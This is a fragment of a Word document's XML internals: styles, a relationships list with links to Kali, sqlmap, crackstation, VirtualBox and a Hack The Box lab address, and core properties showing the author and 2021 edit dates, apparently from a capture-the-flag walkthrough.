      <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
      <w:spacing w:before="240" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odlomakpopisa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009765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4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hyperlink" Target="https://www.kali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image" Target="media/image1.gif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hyperlink" Target="https://www.youtube.com/watch?v=V_Payl5FlgQ&amp;t=1046s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crackstation.net/" TargetMode="External"/><Relationship Id="rId59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hyperlink" Target="https://www.virtualbox.org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://10.10.10.46/dashboard.php?search=a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github.com/sqlmapproject/sqlmap.git" TargetMode="External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www.hackthebox.eu/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33</Pages>
  <Words>3201</Words>
  <Characters>18246</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>152</Lines>
  <Paragraphs>42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Ivić</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Filip Ivić</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-27T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-28T18:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>